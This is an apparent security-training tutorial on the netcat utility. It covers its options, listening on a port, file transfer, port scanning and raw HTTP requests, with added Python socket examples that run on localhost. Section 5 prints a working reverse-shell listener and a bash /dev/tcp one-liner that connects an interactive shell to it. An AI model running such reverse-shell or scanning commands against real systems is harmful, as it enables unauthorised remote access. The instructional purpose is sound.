
Netcat (often abbreviated as nc) is a lightweight yet powerful UNIX utility for reading and writing data across network connections over TCP or UDP. Designed as a versatile "back-end" tool, it can be used directly or driven from scripts and other programs.
Netcat also serves as a network debugging and exploration tool: it can establish many kinds of network connections and exposes a number of built-in features for inspecting them.
Basic Usage
To establish a connection to a specified host and port:
nc host port
Help Menu
To display available options and usage information:
netcat -h
Options Overview:
- -c : Execute shell commands (similar to -e; potentially unsafe)
- -e : Execute a specified program after connecting (potential security risk)
- -b : Allow broadcasts
- -g : Specify source-routing hop points (up to 8)
- -G : Define source-routing pointer (values: 4, 8, 12, etc.)
- -i : Set delay interval for sent lines or scanned ports
- -k : Enable keep-alive option
- -l : Listen mode for incoming connections
- -n : Use numeric-only IP addresses (bypass DNS resolution)
- -o : Output hex dump of traffic to a file
- -p : Specify a local port number
- -r : Randomize local and remote ports
- -q : Quit after EOF on stdin with specified delay
- -s : Set local source address
- -T : Set Type of Service (ToS)
- -t : Respond to TELNET negotiation
- -u : Enable UDP mode
- -v : Enable verbose mode (use twice for more verbosity)
- -w : Set timeout for connections and final reads
- -C : Send CRLF as line-ending
- -z : Zero-I/O mode (commonly used for scanning)
Practical Use Cases
1. Listening on a Port
To start listening on a port, open two terminal windows:
Terminal 1 (Listening on Port 1234):
nc -l -p 1234
Terminal 2 (Connecting to Port 1234):
nc 127.0.0.1 1234
Once connected, any message entered in Terminal 2 will be received in Terminal 1, confirming successful communication.
2. Transferring Data
To send a file between two terminals:
Terminal 1 (Receiving Data):
nc -l -p 1234 > output.txt
Terminal 2 (Sending Data):
echo "armourinfosec" > input.txt
nc 127.0.0.1 1234 < input.txt
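What the two terminals above are doing underneath is a plain TCP listener and a plain TCP client that sends bytes until end-of-file. The following Python script is an added example (not code from the original post) that reproduces the "Listening on a Port" and "Transferring Data" exchanges with the standard socket module, on 127.0.0.1 with a kernel-chosen port, using a constructed payload. It also adds the check netcat itself does not perform: comparing a SHA-256 hash of what was received against what was sent, since nc gives no integrity guarantee of its own.

```python
"""Socket-level equivalent of `nc -l -p PORT > output.txt` (receiver) and
`nc HOST PORT < input.txt` (sender), followed by a SHA-256 comparison.
Added example: standard library only, runs entirely on localhost."""
import hashlib
import socket
import threading


def receive_until_eof(listener):
    """Accept one connection and read until the peer closes (what `nc -l` does)."""
    conn, _ = listener.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:            # empty read: the peer sent EOF / closed
                break
            chunks.append(data)
    return b"".join(chunks)


def send_all_then_close(host, port, payload):
    """Connect, push the whole payload, then signal EOF like nc reaching end of stdin."""
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        sock.shutdown(socket.SHUT_WR)


def transfer(payload, host="127.0.0.1"):
    """Run receiver and sender on localhost; return (received_bytes, hashes_match)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((host, 0))        # port 0: let the kernel pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}

    def recv_thread():
        result["data"] = receive_until_eof(listener)

    t = threading.Thread(target=recv_thread)
    t.start()
    send_all_then_close(host, port, payload)
    t.join(timeout=10)
    listener.close()

    received = result.get("data", b"")
    # The check nc does not do: verify the bytes arrived intact.
    ok = hashlib.sha256(received).hexdigest() == hashlib.sha256(payload).hexdigest()
    return received, ok


if __name__ == "__main__":
    # Constructed sample payload, standing in for input.txt.
    data, ok = transfer(b"armourinfosec\n" * 1000)
    print(f"received {len(data)} bytes, integrity ok: {ok}")
```

With real netcat the same check is `sha256sum input.txt` on the sender and `sha256sum output.txt` on the receiver; the listener also has to see EOF, which is why the sender redirects from a file rather than typing interactively.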
3. Port Scanning
To check the status of ports on a target system:
Scan a Single Port:
netcat -z -v 127.0.0.1 1234
Scan Multiple Ports:
nc -z -v 127.0.0.1 1234 1235
Scan a Range of Ports:
nc -z -v 127.0.0.1 1233-1240
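The `-z` mode is a TCP connect probe: netcat completes (or fails to complete) the three-way handshake and reports the result, and `-w` decides how long it waits when nothing answers. The script below is an added example (not from the original post) that reproduces that logic with the standard socket module so the three possible outcomes are explicit: "open" (handshake completed), "closed" (connection refused, i.e. an RST came back) and "filtered" (no answer before the timeout, which is what a dropping firewall looks like). It runs against 127.0.0.1 only, opening one listening socket to stand in for a live service and releasing another ephemeral port to stand in for a closed one; it is meant for checking which of your own services are actually reachable.

```python
"""What `nc -z -v host port` does under the hood: a TCP connect probe that
classifies a port as open, closed or filtered. Added example, stdlib only."""
import errno
import socket


def probe_port(host, port, timeout=2.0):
    """Return 'open', 'closed' or 'filtered' for host:port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)        # the role of nc -w
    try:
        sock.connect((host, port))
        return "open"               # handshake completed, something is listening
    except socket.timeout:
        return "filtered"           # neither SYN-ACK nor RST: probably dropped
    except ConnectionRefusedError:
        return "closed"             # RST received: nothing listening
    except OSError as exc:
        if exc.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH):
            return "filtered"
        raise
    finally:
        sock.close()


def probe_range(host, first, last, timeout=2.0):
    """Mirror of `nc -z -v host first-last`: mapping of port -> state."""
    return {p: probe_port(host, p, timeout) for p in range(first, last + 1)}


def _demo_ports():
    """Create one listening socket (an open port) and find a port nothing
    listens on (a closed port). Both on 127.0.0.1 so the example runs offline."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]

    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                     # released, so a connect to it is refused
    return listener, open_port, closed_port


def demo():
    """Probe the two constructed ports; return (results, open_port, closed_port)."""
    listener, open_port, closed_port = _demo_ports()
    try:
        results = {
            open_port: probe_port("127.0.0.1", open_port),
            closed_port: probe_port("127.0.0.1", closed_port),
        }
    finally:
        listener.close()
    return results, open_port, closed_port


if __name__ == "__main__":
    results, open_port, closed_port = demo()
    for port, state in sorted(results.items()):
        print(f"127.0.0.1:{port} {state}")
```

Note that a "filtered" verdict only means no reply arrived in time; a slow host or a tight `-w` value produces the same result, so repeat with a longer timeout before concluding a firewall is in the way.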
4. Sending an HTTP Request
To send an HTTP GET request:
printf "GET /nc.1 HTTP/1.1\r\nHost: armourinfosec.com\r\n\r\n" | nc armourinfosec.com 80
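That one-liner works only because of details that are easy to get wrong: HTTP/1.1 requires a Host header, every line must end in CRLF (which is what the `-C` option supplies when typing interactively), and the headers are terminated by an empty line, without which the server keeps waiting. The script below is an added example (not from the original post) that sends exactly those bytes over a raw socket and parses the status line of the reply. It assumes nothing about armourinfosec.com: it starts a throwaway HTTP server from the standard library on 127.0.0.1 so the exchange can be run offline.

```python
"""Raw HTTP/1.1 over a plain socket, the same bytes as `printf ... | nc host 80`,
against a local test server so the example runs offline. Added example, stdlib only."""
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class _QuietHandler(BaseHTTPRequestHandler):
    """Minimal test server: answers every GET with a fixed text body."""

    def do_GET(self):
        body = b"hello from test server\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo output quiet
        pass


def start_test_server():
    """Bind to a kernel-chosen port on localhost and serve in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), _QuietHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def build_request(path, host):
    """Exactly what the article's printf produces: CRLF line endings, a Host
    header (mandatory in HTTP/1.1) and an empty line closing the header block.
    Connection: close asks the server to end the exchange after one response."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def send_raw(host, port, request, timeout=5.0):
    """Connect, send the request bytes, read to EOF; return (status_code, body)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        raw = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:           # server closed: the response is complete
                break
            raw += chunk
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]   # e.g. b"HTTP/1.0 200 OK"
    return int(status_line.split()[1]), body


def demo():
    """Run the request against the local test server; return (status, body)."""
    server, port = start_test_server()
    try:
        return send_raw("127.0.0.1", port, build_request("/nc.1", "127.0.0.1"))
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    status, body = demo()
    print(status, body.decode())
```

Leaving out the final `\r\n` in the printf is the usual reason a netcat HTTP probe appears to hang: the server is still waiting for the end of the headers.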
5. Creating a Reverse Shell
Step 1: Start a Listener
nc -nlvp 5555
Replace 5555 with the desired port.
Step 2: Connect from Target System
bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/5555 <&1'
This establishes a reverse shell from the target system to the listener.
6. Simple Chat with Netcat
To establish a basic chat session:
Terminal 1 (Listening for Messages):
nc -lp 1234
Terminal 2 (Connecting and Sending Messages):
nc 127.0.0.1 1234
Netcat is an invaluable tool for network administrators, ethical hackers, and developers. Whether used for troubleshooting, port scanning, file transfers, or setting up reverse shells, its flexibility makes it an essential component of any UNIX toolkit.